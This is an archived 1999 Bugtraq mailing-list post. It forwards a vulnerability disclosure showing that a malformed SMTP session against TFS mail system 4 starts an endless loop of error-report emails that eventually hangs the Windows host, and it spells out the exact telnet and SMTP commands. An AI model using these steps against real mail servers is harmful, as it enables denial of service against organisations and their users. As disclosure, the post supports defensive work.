There was a similar problem with SMAP on Gauntlet Firewalls a couple of years back. Only in that instance, it would eventually fill up the filesystem with logs, and the proxy service would fail. blue0ne -----Original Message----- From: Alfred Huger <ahat_private> To: BUGTRAQat_private <BUGTRAQat_private> Date: Thursday, September 02, 1999 3:35 AM Subject: I found this today and iam reporting it to you first!!! (fwd) >---------- Forwarded message ---------- >Date: Mon, 30 Aug 1999 21:08:14 +0200 >From: Hakan Franzen <fablemanat_private> >To: vuldbat_private >Subject: I found this today and iam reporting it to you first!!! > >Target: TFS mail system 4 (i think its working on earlier version aswell) (TFS just got some award about there security about emails) >Company makes the product: www.tenfour.se >OS: win95 98 nt >Reported by: FableMan Noxidus a member of #HACK on IRCNet >a DoS routine: Makes a FAST loop generating loooots of emails until its forced to stop by admin. > >what i did is: TELNET TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX 25 >typing HELO >typing MAIL FROM:FABLEMAN NOXIDUS >RCPT TO:FIXYOUR SYSTEM.@TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX >DATA >Fix you system >Error found by FableMan Noxidus a #HACK member of IRCNet >. >QUIT > > >Thats all now the system tries to send to FIXYOUR SYSTEM.@TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX >but that address is wrong soo then it generates a reporterror and mails to FABLEMAN NOXIDUS but cos i havent included a @ then i will not go out on internet >then the loops starts.. its generating a reporterror and the loop is a truh.. > >I found it when i was playing around with a TFS mail gate system.. > >The speed of error report generation is about 1 or more email /sec soo if you start the loop and after 1 hr its a loot of email generated... >until windows or NT hangs cos of it
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:12 PDT